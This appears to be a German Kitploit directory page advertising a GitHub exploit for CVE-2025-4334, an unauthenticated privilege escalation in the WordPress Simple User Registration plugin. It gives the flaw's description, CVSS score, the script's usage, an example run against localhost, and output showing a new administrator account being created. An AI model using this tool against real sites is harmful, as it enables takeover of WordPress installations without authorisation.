Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-4334 — Einfache Benutzerregistrierung <= 6.3 - Nicht authentifizierte Privilegieneskalation | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-4334
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Einfache Benutzerregistrierung <= 6.3 - Nicht authentifizierte Privilegieneskalation

Repository anzeigen
73vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔓 Simple User Registration <= 6.3 – Unauthenticated Privilege Escalation

📄 Beschreibung

Das Simple User Registration Plugin für WordPress ist in allen Versionen bis einschließlich 6.3 anfällig für Privilege Escalation.
Grund dafür sind unzureichende Einschränkungen bei Benutzer-Meta-Werten, die während der Registrierung übergeben werden können.
Dadurch können nicht authentifizierte Angreifer sich als Administrator registrieren.


🛡️ Details zur Schwachstelle

  • Typ: Fehlerhaftes Berechtigungsmanagement
  • CVE: CVE-2025-4334
  • CVSS-Score: 9.8 (Kritisch)
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Öffentlich veröffentlicht: 25. Juni 2025
  • Zuletzt aktualisiert: 26. Juni 2025

🛠️ Exploit-Skript

Der Exploit automatisiert die Privilegienausweitung durch Formularübermittlung unter Verwendung von extrahiertem Nonce, Formular-ID und Referer.

⚙️ Verwendung

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - von Khaled Alenazi (Nxploited)

Optionen:
  -h, --help     Zeigt diese Hilfemeldung an und beendet das Programm
  -u, --url URL  Basis-WordPress-URL (z.B. http://localhost/wordpress/)
  --form FORM    Vollständige URL der Seite, die das Registrierungsformular enthält

🌐 URL-Erklärung

  • -u → Basis-WordPress-Installation (z.B. http://localhost/wordpress/)
  • --form → Vollständige URL zum anfälligen Registrierungsformular (z.B. http://localhost/wpr/default-registration/)

🧪 Beispiel

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ Ergebnis

root@kitploit:~
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungs- und Forschungszwecken.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


Von: Khaled_alenazi (Nxploited)

Tool herunterladen